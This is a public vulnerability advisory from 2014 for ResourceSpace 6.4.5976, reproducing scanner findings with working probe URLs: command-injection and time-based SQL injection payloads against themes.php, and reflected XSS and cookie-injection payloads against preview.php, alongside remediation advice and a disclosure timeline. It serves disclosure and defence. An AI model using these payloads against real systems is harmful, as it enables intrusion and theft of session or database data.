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ResourceSpace 6.4.5976 XSS / SQL Injection / Insecure Cookie Handling

🗓️ 11 Dec 2014 00:00:00Reported by Petri IivonenType 
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ResourceSpace XSS / SQL Injection / Cookie Handling Vulnerabilitie

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`Title: ResourceSpace Multiple Cross Site Scripting, and HTML and SQL Injection Vulnerabilities  
Author: Petri Iivonen  
Contact: petri.iivonen_at_tmbc_gov_uk  
Discovered: 11 June 2014  
Updated: 11 December 2014  
Published: 11 December 2014  
Vendor: Montala Limited  
Vendor url: www.resourcespace.org  
Software: ResourceSpace Digital Asset Management Software  
Versions: 6.4.5976 and prior  
Status: Unpatched  
Vulnerable scripts:  
/pages/themes.php  
/pages/preview.php  
/pages/help.php  
/pages/search.php  
/pages/user_password.php  
/pages/user_request.php  
(and probably others)  
  
Description:  
ResourceSpace is vulnerable to Cross-Site Scripting, and HTML and SQL injection attacks, and insecure cookie handling. The scripts fail to properly sanitize user-supplied input, check the network protocol used to access the site.  
  
Vulnerability: SC­1414  
Name: Cross Site Scripting (XSS)  
Type: Application  
Asset Group: Multiple  
Source: SureCloud  
IP Address:  
Status: Open  
Hostname:  
Last Seen: 6 Oct 2014  
Service: tcp/https:443  
Severity: 4  
Risk: 40  
CVSS Base Score: 5.8 ( Exploit: 8.6 Impact: 4.9 )  
Resolution Effort: 3  
  
Description:  
This web application is vulnerable to Cross Site Scripting (XSS).  
XSS is caused when an application echoes user controllable input data back to the browser without first sanitising or escaping dangerous characters. Unescaped strings are then interpreted or executed by the browser as script, just as if they had originated from the web server.  
Malicious script is sent by the attacker via the vulnerable web application and executed on the victims browser, within the context of that user and may be used to steal session information, redirect users to a malicious site, and even steal credentials in a Phishing attack.  
Ref: http://www.owasp.org/index.php/Cross_Site_Scripting  
http://cwe.mitre.org/data/definitions/79.html  
  
Solution:  
Validate all user controllable input data (hidden fields, URL parameters, Cookie values, HTTP headers etc) against expected Type, Length and where possible, Format and Range characteristics. Reject any data that fails validation.  
Sanitise all user controllable input data (hidden fields, URL parameters, Cookie values, HTTP headers etc) by converting potentially dangerous characters (listed below) into HTML entities such as > < etc using output encoding.  
By combining proper input validation with effective input sanitisation and output encoding, Cross Site Scripting vulnerabilities will be mitigated.  
[1] <> (triangular parenthesis)  
[2] " (quotation mark)  
[3] ' (single apostrophe)  
[4] % (percent sign)  
[5] ; (semicolon)  
[6] () (parenthesis)  
[7] & (ampersand sign)  
[8] + (plus sign)  
[9] / (forward slash)  
[10] | (pipe)  
[11] [] (square brackets)  
[12] : (colon)  
  
Information  
URI: /pages/preview.php  
Parameter: sort (GET)  
Other Info: "><SCRIPT>alert('SureApp XSS');</SCRIPT>  
  
Vulnerability: 44967  
Name: CGI Generic Command Execution (time­based)  
Type: CGI abuses  
Asset Group: Multiple  
Source: SureCloud Vulnerability Scan  
IP Address  
Status: Open  
Hostname:  
Last Seen: 11 Nov 2014  
Service: tcp/www:443  
Severity: 4  
Risk: 40  
CVSS Base Score: 7.5  
  
Description:  
The remote web server hosts CGI scripts that fail to adequately sanitize request strings. By leveraging this issue, an attacker may be able to execute arbitrary commands on the remote host.  
Note that this script uses a time­based detection method which is less reliable than the basic method.  
  
Solution:  
Restrict access to the vulnerable application. Contact the  
vendor for a patch or upgrade.  
  
Information:  
Using the GET HTTP method, Nessus found that:  
  
+ The following resources may be vulnerable to arbitrary command execution (time based) :  
+ The 'lastlevelchange' parameter of the /pages/themes.php CGI :  
  
/pages/themes.php?lastlevelchange=%20;%20x%20%7C%7C%20sleep%203%20%26  
/pages/themes.php?lastlevelchange=%7C%7C%20sleep%203%20%26  
/pages/themes.php?lastlevelchange=%26%20ping%20­n%203%20127.0.0.1%20%26  
/pages/themes.php?lastlevelchange=x%20%7C%7C%20ping%20­n%203%20127.0.0.1%20%26  
/pages/themes.php?lastlevelchange=%7C%7C%20ping%20­n%203%20127.0.0.1%20%26  
/pages/themes.php?lastlevelchange=%7C%20ping%20­n%203%20127.0.0.1%20%7C  
  
References:  
CWE: 20  
CWE: 713  
CWE: 722  
CWE: 727  
CWE: 74  
CWE: 77  
CWE: 78  
  
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Vulnerability: 43160  
Name: CGI Generic SQL Injection (blind, time based)  
Type: CGI abuses  
Asset Group: Multiple  
Source: SureCloud Vulnerability Scan  
IP Address:  
Status: Open  
Hostname:  
Last Seen: 11 Nov 2014  
Service: tcp/www:443  
Severity: 4  
Risk: 40  
CVSS Base Score: 7.5  
  
Description  
By sending specially crafted parameters to one or more CGI scripts hosted on the remote web server, Nessus was able to get a slower  
response, which suggests that it may have been able to modify the behavior of the application and directly access the underlying database.  
An attacker may be able to exploit this issue to bypass authentication, read confidential data, modify the remote database, or even take control of the remote operating system.  
Note that this script is experimental and may be prone to false positives.  
  
Solution:  
Modify the affected CGI scripts so that they properly escape arguments.  
  
Information:  
Using the GET HTTP method, Nessus found that :  
+ The following resources may be vulnerable to blind SQL injection (time based) :  
+ The 'lastlevelchange' parameter of the /pages/themes.php CGI :  
/pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)='  
/pages/themes.php?lastlevelchange='%20AND%200%20IN%20(SELECT%20SLEEP(3))%20­­%20  
/pages/themes.php?lastlevelchange=';WAITFOR%20DELAY%20'00:00:3';  
/pages/themes.php?lastlevelchange=');WAITFOR%20DELAY%20'00:00:3';  
/pages/themes.php?lastlevelchange='));WAITFOR%20DELAY%20'00:00:3';  
/pages/themes.php?lastlevelchange=';SELECT%20pg_sleep(3);  
/pages/themes.php?lastlevelchange=');SELECT%20pg_sleep(3);  
/pages/themes.php?lastlevelchange='));SELECT%20pg_sleep(3);  
  
Clicking directly on these URLs should exhibit the issue :  
(you will probably need to read the HTML source)  
/pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)='  
  
References  
CWE: 20  
CWE: 713  
CWE: 722  
CWE: 727  
CWE: 751  
CWE: 77  
CWE: 801  
CWE: 810  
CWE: 89  
  
–---------------------------------------------------------------------------------------------------------------  
  
Vulnerability: 55903  
Name: CGI Generic XSS (extended patterns)  
Type: CGI abuses : XSS  
Asset Group: Multiple  
Source: SureCloud Vulnerability Scan  
IP Address:  
Status: Open  
Hostname  
Last Seen: 11 Nov 2014  
Service: tcp/www:443  
Severity: 3  
Risk: 30  
CVSS Base Score: 4.3  
  
Description  
The remote web server hosts one or more CGI scripts that fail to adequately sanitize request strings with malicious JavaScript. By leveraging this issue, an attacker may be able to cause arbitrary HTML and script code to be executed in a user's browser within the security context of the affected site. These XSS vulnerabilities are likely to be 'non­persistent' or 'reflected'.  
  
Solution  
Restrict access to the vulnerable application. Contact the vendor for a patch or upgrade.  
  
Information  
Using the GET HTTP method, Nessus found that :  
+ The following resources may be vulnerable to cross­site scripting+ The 'sort' parameter of the /pages/preview.php CGI :  
/pages/preview.php?sort=504%20onerror="alert(504);  
­­­­­­­­ output ­­­­­­­­  
(extended patterns) :  
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="  
/pages/view.php?ref=&search=&offset=&order_by=&sort  
=504 onerror="alert(504);&archive=&k="><&nbsp;Back to resource view</  
a>  
­­­­­­­­­­­­­­­­­­­­­­­­  
/pages/preview.php?sort=&sort=504%20onerror="alert(504);  
­­­­­­­­ output ­­­­­­­­  
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="  
/pages/view.php?ref=&search=&offset=&order_by=&sort  
=504 onerror="alert(504);&archive=&k="><&nbsp;Back to resource view</  
a>  
­­­­­­­­­­­­­­­­­­­­­­­­  
+ The 'order_by' parameter of the /pages/preview.php CGI :  
/pages/preview.php?order_by=504%20onerror="alert(504);  
­­­­­­­­ output ­­­­­­­­  
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="  
/pages/view.php?ref=&search=&offset=&order_by=504 o  
nerror="alert(504);&sort=DESC&archive=&k="><&nbsp;Back to resource vi  
ew</a>  
­­­­­­­­­­­­­­­­­­­­­­­­  
/pages/preview.php?order_by=&order_by=504%20onerror="alert(504);  
­­­­­­­­ output ­­­­­­­­  
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="  
/pages/view.php?ref=&search=&offset=&order_by=504 o  
nerror="alert(504);&sort=DESC&archive=&k="><&nbsp;Back to resource vi  
ew</a>  
­­­­­­­­­­­­­­­­­­­­­­­­  
+ The 'sort' parameter of the /pages/preview.php CGI :  
/pages/preview.php?sort=504%20onerror="alert(504);&search=&order_by=&fro  
m=  
­­­­­­­­ output ­­­­­­­­  
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="  
/pages/view.php?ref=&search=&offset=&order_by=&sort  
=504 onerror="alert(504);&archive=&k="><&nbsp;Back to resource view</  
a>  
­­­­­­­­­­­­­­­­­­­­­­­­  
/pages/preview.php?sort=&sort=504%20onerror="alert(504);&search=&order_b  
y=&from=  
­­­­­­­­ output ­­­­­­­­  
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="  
/pages/view.php?ref=&search=&offset=&order_by=&sort  
=504 onerror="alert(504);&archive=&k="><&nbsp;Back to resource view</  
a>  
­­­­­­­­­­­­­­­­­­­­­­­­  
+ The 'order_by' parameter of the /pages/preview.php CGI :  
/pages/preview.php?sort=&search=&order_by=504%20onerror="alert(504);&fro  
m=  
­­­­­­­­ output ­­­­­­­­  
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="  
/pages/view.php?ref=&search=&offset=&order_by=504 o  
nerror="alert(504);&sort=&archive=&k="><&nbsp;Back to resource view</  
Tonbridge & Malling Borough Council  
Vulnerabilities Report | 5  
a>  
­­­­­­­­­­­­­­­­­­­­­­­­  
/pages/preview.php?sort=&search=&order_by=&order_by=504%20onerror="alert  
(504);&from=  
­­­­­­­­ output ­­­­­­­­  
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="  
/pages/view.php?ref=&search=&offset=&order_by=504 o  
nerror="alert(504);&sort=&archive=&k="><&nbsp;Back to resource view</  
a>  
­­­­­­­­­­­­­­­­­­­­­­­­  
Clicking directly on these URLs should exhibit the issue :  
(you will probably need to read the HTML source)  
/pages/preview.php?sort=504%20onerror="alert(504);  
/pages/preview.php?order_by=504%20onerror="alert(504);  
References  
CWE: 116  
CWE: 20  
CWE: 442  
CWE: 692  
CWE: 712  
CWE: 722  
CWE: 725  
CWE: 74  
CWE: 751  
CWE: 79  
CWE: 80  
CWE: 801  
CWE: 81  
CWE: 811  
CWE: 83  
CWE: 86  
  
–----------------------------------------------------------------------------------------------------  
  
Vulnerability: 49067  
Name: CGI Generic HTML Injections (quick test)  
Type: CGI abuses : XSS  
Asset Group: Multiple  
Source: SureCloud Vulnerability Scan  
IP Address:   
Status: Open  
Hostname  
Last Seen: 11 Nov 2014  
Service: tcp/www:443  
Severity: 3  
Risk: 30  
CVSS Base Score: 5.0  
  
Description  
The remote web server hosts CGI scripts that fail to adequately sanitize  
request strings with malicious JavaScript. By leveraging this issue,  
an attacker may be able to cause arbitrary HTML to be executed inuser's browser within the security context of the affected site.  
The remote web server may be vulnerable to IFRAME injections or  
cross­site scripting attacks :  
­ IFRAME injections allow 'virtual defacement' that  
might scare or anger gullible users. Such injections  
are sometimes implemented for 'phishing' attacks.  
­ XSS are extensively tested by four other scripts.  
­ Some applications (e.g. web forums) authorize a subset  
of HTML without any ill effect. In this case, ignore  
this warning.  
  
Solution  
Either restrict access to the vulnerable application or contact the  
vendor for an update.  
  
Information  
Using the GET HTTP method, Nessus found that :  
+ The following resources may be vulnerable to HTML injection :  
+ The 'sort' parameter of the /pages/preview.php CGI :  
/pages/preview.php?sort=<"jfunqd%20>  
­­­­­­­­ output ­­­­­­­­  
a  
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="  
/pages/view.php?ref=&search=&offset=&order_by=&sort  
=<"jfunqd >&archive=&k="><&nbsp;Back to resource view</a>  
­­­­­­­­­­­­­­­­­­­­­­­­  
+ The 'order_by' parameter of the /pages/preview.php CGI :  
/pages/preview.php?order_by=<"jfunqd%20>  
­­­­­­­­ output ­­­­­­­­  
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="  
/pages/view.php?ref=&search=&offset=&order_by=<"jfu  
nqd >&sort=DESC&archive=&k="><&nbsp;Back to resource view</a>  
­­­­­­­­­­­­­­­­­­­­­­­­  
+ The 'sort' parameter of the /pages/preview.php CGI :  
/pages/preview.php?sort=<"jfunqd%20>&search=&order_by=&from=  
­­­­­­­­ output ­­­­­­­­  
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="  
/pages/view.php?ref=&search=&offset=&order_by=&sort  
=<"jfunqd >&archive=&k="><&nbsp;Back to resource view</a>  
­­­­­­­­­­­­­­­­­­­­­­­­  
+ The 'order_by' parameter of the /pages/preview.php CGI :  
/pages/preview.php?sort=&search=&order_by=<"jfunqd%20>&from=  
­­­­­­­­ output ­­­­­­­­  
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="  
/pages/view.php?ref=&search=&offset=&order_by=<"jfu  
nqd >&sort=&archive=&k="><&nbsp;Back to resource view</a>  
­­­­­­­­­­­­­­­­­­­­­­­­  
Clicking directly on these URLs should exhibit the issue :  
(you will probably need to read the HTML source)  
/pages/preview.php?sort=<"jfunqd%20>  
/pages/preview.php?order_by=<"jfunqd%20>  
  
References  
CWE: 80  
CWE: 86  
  
–---------------------------------------------------------------------------------------------------  
Vulnerability: SC­1628  
Name: SSL cookie without secure flag set  
Type: Web Servers  
Asset Group: Multiple  
Source: SureCloud  
IP Address:  
Status: Open  
Hostname:  
Last Seen: 12 Nov 2014  
Service: tcp/https:443  
Severity: 3  
Risk: 30  
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )  
  
Resolution Effort: 1  
Description  
If the secure flag is not set, then the cookie will be transmitted in clear­text if the user visits any non SSL  
(HTTP) URLs within the cookie's scope.  
Solution  
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing  
content over HTTPS.  
If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS  
should employ their own session handling mechanism, and the session tokens used should never be  
transmitted over unencrypted communications.  
Information  
  
URI: /pages/help.php  
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:53:11 GMT  
URI: /pages/search.php  
Other Info: display=thumbs; httponly  
URI: /pages/themes.php  
Other Info: saved_themes_order_by=name; httponly  
URI: /pages/user_password.php  
Other Info: starsearch=deleted; expires=Tue, 12­Nov­2013 01:53:08 GMT; httponly  
URI: /pages/user_password.php  
Other Info: starsearch=deleted; expires=Tue, 12­Nov­2013 01:54:30 GMT; httponly  
URI: /pages/user_request.php  
Other Info: starsearch=deleted; expires=Tue, 12­Nov­2013 01:53:07 GMT; httponly  
URI: /pages/user_request.php  
Other Info: starsearch=deleted; expires=Tue, 12­Nov­2013 01:54:25 GMT; httponly  
  
–-------------------------------------------------------------------------------  
  
Vulnerability: 44136  
Name: CGI Generic Cookie Injection Scripting  
Type: CGI abuses  
Asset Group: Multiple  
Source: SureCloud Vulnerability Scan  
IP Address:  
Status: Open  
Hostname:  
Last Seen: 11 Nov 2014  
Service: tcp/www:443  
Severity: 3  
Risk: 30  
CVSS Base Score: 5.0  
  
Description  
The remote web server hosts at least one CGI script that fails to  
adequately sanitize request strings with malicious JavaScript.  
By leveraging this issue, an attacker may be able to inject arbitrary  
cookies. Depending on the structure of the web application, it may be  
possible to launch a 'session fixation' attack using this mechanism.  
Please note that :  
­ Nessus did not check if the session fixation attack is  
feasible.  
­ This is not the only vector of session fixation.  
  
Solution  
Restrict access to the vulnerable application. Contact the vendor  
for a patch or upgrade.  
  
Information  
Using the GET HTTP method, Nessus found that :  
+ The following resources may be vulnerable to cookie manipulation :  
+ The 'sort' parameter of the /pages/preview.php CGI :  
/pages/preview.php?sort=<script>document.cookie="testshay=5812;"</script  
>  
­­­­­­­­ output ­­­­­­­­  
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="  
/pages/view.php?ref=&search=&offset=&order_by=&sort  
=<script>document.cookie="testshay=5812;"</script>&archive=&k="><&nbs  
p;Back to resource view</a>  
­­­­­­­­­­­­­­­­­­­­­­­­  
/pages/preview.php?sort=&sort=<script>document.cookie="testshay=5812;"</  
script>  
­­­­­­­­ output ­­­­­­­­  
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="  
/pages/view.php?ref=&search=&offset=&order_by=&sort  
=<script>document.cookie="testshay=5812;"</script>&archive=&k="><&nbs  
p;Back to resource view</a>  
­­­­­­­­­­­­­­­­­­­­­­­­  
References  
CWE: 472  
CWE: 642  
CWE: 715  
CWE: 722  
  
–--------------------------------------------------------------------------------------------  
  
Vulnerability: 39466  
Name: CGI Generic XSS (quick test)  
Type: CGI abuses : XSS  
Asset Group: Multiple  
Source: SureCloud Vulnerability Scan  
IP Address:   
Status: Open  
Hostname:   
Last Seen: 11 Nov 2014  
Service: tcp/www:443  
Severity: 3  
Risk: 30  
CVSS Base Score: 5.0  
  
Description  
The remote web server hosts CGI scripts that fail to adequately sanitize  
request strings with malicious JavaScript. By leveraging this issue,  
an attacker may be able to cause arbitrary HTML and script code  
to be executed in a user's browser within the security context of the  
affected site.  
These XSS are likely to be 'non persistent' or 'reflected'.  
Solution  
Restrict access to the vulnerable application. Contact the vendor  
for a patch or upgrade.  
  
Information  
Using the GET HTTP method, Nessus found that :  
+ The following resources may be vulnerable to cross­site scripting (quick+ The 'order_by' parameter of the /pages/preview.php CGI :  
/pages/preview.php?order_by=<IMG%20SRC="javascript:alert(104);">  
­­­­­­­­ output ­­­­­­­­  
test) :  
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="  
/pages/view.php?ref=&search=&offset=&order_by=<IMG  
SRC="javascript:alert(104);">&sort=DESC&archive=&k="><&nbsp;Back to r  
esource view</a>  
­­­­­­­­­­­­­­­­­­­­­­­­  
/pages/preview.php?order_by=&order_by=<IMG%20SRC="javascript:alert(104);  
">  
­­­­­­­­ output ­­­­­­­­  
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="  
/pages/view.php?ref=&search=&offset=&order_by=<IMG  
SRC="javascript:alert(104);">&sort=DESC&archive=&k="><&nbsp;Back to r  
esource view</a>  
­­­­­­­­­­­­­­­­­­­­­­­­  
+ The 'sort' parameter of the /pages/preview.php CGI :  
/pages/preview.php?sort=<IMG%20SRC="javascript:alert(104);">  
­­­­­­­­ output ­­­­­­­­  
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="  
/pages/view.php?ref=&search=&offset=&order_by=&sort  
=<IMG SRC="javascript:alert(104);">&archive=&k="><&nbsp;Back to resou  
rce view</a>  
­­­­­­­­­­­­­­­­­­­­­­­­  
/pages/preview.php?sort=&sort=<IMG%20SRC="javascript:alert(104);">  
­­­­­­­­ output ­­­­­­­­  
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="  
/pages/view.php?ref=&search=&offset=&order_by=&sort  
=<IMG SRC="javascript:alert(104);">&archive=&k="><&nbsp;Back to resou  
rce view</a>  
­­­­­­­­­­­­­­­­­­­­­­­­  
  
References  
CWE: 116  
CWE: 20  
CWE: 442  
CWE: 692  
CWE: 712  
CWE: 722  
CWE: 725  
CWE: 74  
CWE: 751  
CWE: 79  
CWE: 80  
CWE: 801  
CWE: 81  
CWE: 811  
CWE: 83  
CWE: 86  
  
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Also issues to be aware of:  
  
Vulnerability: SC­1629  
Name: Cookie without HttpOnly flag set  
Type: Web Servers  
Asset Group: Multiple  
Source: SureCloud  
IP Address:  
Status: Open  
Hostname:  
Last Seen: 12 Nov 2014  
Service: tcp/https:443  
Severity: 3  
Risk: 30  
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )  
Resolution Effort: 1  
Description  
When the HttpOnly attribute is set on a cookie, then the cookies value cannot be read or set by client­side  
JavaScript.  
HttpOnly prevent certain client­side attacks, such as Cross Site Scripting (XSS), from capturing the cookies  
value via an injected script. When HttpOnly is set, script access to document.cookie results in a blank string  
being returned.  
Solution  
HttpOnly can safely be set for all Cookie values, unless the application has a specific need for Script access  
to cookie contents (which is highly unusual).  
Please note also that HttpOnly does not mitigate against all dangers of Cross Site Scripting ­ any XSS  
vulnerabilities identified must still be fixed.  
Information  
URI: /pages/help.php  
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:53:11 GMT  
  
–-------------------------------------------------------------------------------  
  
Vulnerability: SC­1629  
Name: Cookie without HttpOnly flag set  
Type: Web Servers  
Asset Group: Multiple  
Source: SureCloud  
IP Address:  
Status: Open  
Hostname:   
Last Seen: 12 Nov 2014  
Service: tcp/http:80  
Severity: 3  
Risk: 30  
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )  
Resolution Effort: 1  
  
Description  
When the HttpOnly attribute is set on a cookie, then the cookies value cannot be read or set by client­side JavaScript.  
HttpOnly prevent certain client­side attacks, such as Cross Site Scripting (XSS), from capturing the cookies value via an injected script. When HttpOnly is set, script access to document.cookie results in a blank string being returned.  
  
Solution  
HttpOnly can safely be set for all Cookie values, unless the application has a specific need for Script access  
to cookie contents (which is highly unusual).  
Please note also that HttpOnly does not mitigate against all dangers of Cross Site Scripting ­ any XSS vulnerabilities identified must still be fixed.  
  
Information  
URI: /pages/collection_share.php  
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:53:42 GMT  
URI: /pages/contactsheet_settings.php  
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:53:38 GMT  
URI: /pages/help.php  
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:53:05 GMT  
URI: /pages/preview.php  
Other Info: thumbs=hide; expires=Tue, 08­Aug­2017 01:57:55 GMT  
URI: /pages/resource_email.php  
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:57:42 GMT  
URI: /pages/view.php  
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:57:45 GMT  
  
  
Disclosure time-line  
June 2014: Discovery  
11 June 2014: Initial report sent.  
12 June 2014: Vendor announces that vulnerabilities will be fixed in next release  
23 June 2014: Vendor release Version 6.3.5565, no release info assuming quiet patching  
05 July 2014: New scan shows no patches applied  
28 October 2014: Vendor releases Version 6.4.5976. Vulnerabilities still present  
27 November 2014: Second contact, this report delivered to the vendor  
11 December 2014: Public disclosure.  
  
Author disclaimer:  
The information contained in this entire document is for educational, demonstration and testing purposes only.  
Author cannot be held responsible for any malicious use or damage. Use at your own risk.  
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